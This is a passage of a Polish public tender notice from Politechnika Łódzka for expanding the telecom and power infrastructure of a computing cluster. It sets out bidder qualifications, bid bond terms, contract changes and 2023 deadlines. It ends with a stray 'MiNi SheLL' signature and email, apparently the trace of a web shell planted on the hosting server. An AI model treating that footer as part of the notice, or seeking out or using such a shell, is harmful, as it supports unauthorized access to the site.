wykazać, że na okres realizacji zamówienia będzie dysponował osobą przynależącą do właściwej izby samorządu zawodowego, z uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej lub instalacyjnej (instalacje telekomunikacyjne, instalacje sanitarne i elektryczne) lub odpowiadającymi im uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów prawa, która będzie pełnić funkcję kierownika budowy oraz innymi (minimum 3) specjalistami i pracownikami z branży konstrukcyjno-budowlanej i instalacyjnej, doświadczonymi w wykonywaniu prac objętych przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">podpisane oświadczenie<br/>wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru<br/>określonego w Załączniku nr 2 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca musi wykazać wykonanie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwóch zamówień, których przedmiotem była budowa rozbudowa lub modernizacja serwerowni obejmująca min. instalacje elektroenergetyczne i chłodnicze o wartości brutto nie mniejszej niż 300 0000 każde. Do wykazu wykonawca załączy dowody określające, że ww. roboty budowlane, dostawy i instalacje zostały wykonane należycie - sporządzony wg wzoru stanowiącego Załącznik 4 do SWZ . Dowodami, o których mowa powyżej, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>Wykonawca musi wykazać, że na okres realizacji zamówienia będzie dysponował osobą przynależącą do właściwej izby samorządu zawodowego, z uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej lub instalacyjnej (instalacje telekomunikacyjne, instalacje sanitarne i elektryczne) lub odpowiadającymi im uprawnieniami wydanymi na podstawie wcześniej obowiązujących przepisów prawa, która będzie pełnić funkcję kierownika budowy oraz innymi (minimum 3) specjalistami i pracownikami z branży konstrukcyjno-budowlanej i instalacyjnej, doświadczonymi w wykonywaniu prac objętych przedmiotem zamówienia - wg wzoru stanowiącego Załącznik 5 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Kompletna oferta musi zawierać:<br/>- wypełniony formularz ofertowy - zgodny z Załącznikiem nr 1 do SWZ,<br/>- oświadczenie wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – Załącznik nr 2<br/>do SWZ;<br/>- zobowiązanie podmiotu, na którego zasoby powołuje się wykonawca lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tego podmiotu (jeżeli<br/>dotyczy);<br/>- oświadczenie podmiotu, na którego zasoby powołuje się wykonawca, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – Załącznik nr 2 do SWZ (jeżeli dotyczy);<br/>- dokument wpłaty wadium;<br/>- stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio z<br/>odpowiedniego rejestru oraz w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, ustanawiające<br/>pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>niniejszego zamówienia publicznego. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	W niniejszym postępowaniu zamawiający żąda wniesienia wadium w wysokości: 10 000,00 zł.<br/>2.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>2.1.	pieniądzu,<br/>2.2.	gwarancjach bankowych,<br/>2.3.	gwarancjach ubezpieczeniowych,<br/>2.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2.2-2.4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>4.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w pkt 5.2, 5.3 oraz pkt 6. <br/>5.	Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>5.1.	upływu terminu związania ofertą;<br/>5.2.	zawarcia umowy w sprawie zamówienia publicznego;<br/>5.3.	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>6.	Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>6.1.	który wycofał ofertę przed upływem terminu składania ofert;<br/>6.2.	którego oferta została odrzucona;<br/>6.3.	po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>6.4.	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7.	Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Politechniki Łódzkiej:<br/>PEKAO S.A. II O/ ŁÓDŹ, NR RACH.: 25 1240 3028 1111 0000 2822 2228<br/>z zaznaczeniem:<br/>Wadium w przetargu nieograniczonym – „Wykonanie projektu rozbudowy i rozbudowa infrastruktury teletechnicznej oraz instalacji zasilania energetycznego Pomieszczeń Klastra Obliczeniowego w budynku Centrum Technologii Informatycznych PŁ”<br/>(nr spr. UCI 262.1.2023)” <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa w pkt 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo, podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców, musi zostać dołączone do oferty.<br/>3.	Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wyłoniona w prowadzonym postępowaniu jako najkorzystniejsza, przed zawarciem umowy, zamawiający zażąda kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmiany umowy w zakresie: <br/>1.1.	zmianę zakresu Przedmiotu Zamówienia (zwiększenie/zmniejszenie) i/lub zmianę wartości Przedmiotu Zamówienia (zwiększenie/zmniejszenie) w przypadku konieczności wykonania robót zamiennych lub dodatkowych robót budowlanych nieobjętych zakresem opisanym w PFU jednakże zgodnego z zamierzeniem inwestycyjnym opisanym w PFU, zasadami wiedzy technicznej i/lub obowiązującymi na dzień odbioru robót przepisami wykonania Przedmiotu Zamówienia, pozwalających na zaoszczędzenie kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego Przedmiotu Zamówienia,<br/>1.2.	rezygnacji z wykonywania części (elementów) Przedmiotu Zamówienia przewidzianych w PFU i ujętej w przygotowanej przez Wykonawcę Dokumentacji Projektowej tzw. „roboty zaniechane” w sytuacji, gdy ich wykonanie będzie zbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi przepisami wykonania przedmiotu zamówienia,<br/>1.3. zmiany danych teleadresowych Wykonawcy,<br/>1.4. ustawowej zmiany stawki podatku VAT,<br/>1.5. zmiany terminu realizacji umowy w przypadku:<br/>•	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonywania robót,<br/>•	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,<br/>•	wykopalisk uniemożliwiających wykonywanie robót,<br/>•	wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót,<br/>•	braku odpowiednich zgód lub przedłużających się procedur administracyjnych, związanych m.in. z wydaniem przez uprawnione organy niezbędnych do wykonania przedmiotu umowy decyzji i zezwoleń,<br/>•	wydania aktów administracyjnych zmieniających stan prawny znany stronom na dzień zawarcia umowy,<br/>•	wystąpienia roszczeń osób trzecich w związku z realizacją umowy.<br/>•	wystąpienia w trakcie realizacji umowy zamówień dodatkowych i/lub zamiennych, związanych z realizacją zamówienia podstawowego, mających wpływ na uzgodniony termin zakończenia jej realizacji (powodujących konieczność jego wydłużenia), <br/>1.6.	innym, niż wskazany w ppkt a) - e), jeżeli zmiana umowy nie jest istotna w rozumieniu art. 454 ust. 2 Ustawy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-11 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://plodz.ezamawiajacy.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-11 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wymagane terminy realizacji przedmiotu zamówienia:<br/>a)	Zadania 1- 4 – do dnia 30.10.2023<br/>b)	Zadania 5- 6 – do dnia 15.12.2023

Creat By MiNi SheLL
Email: jattceo@gmail.com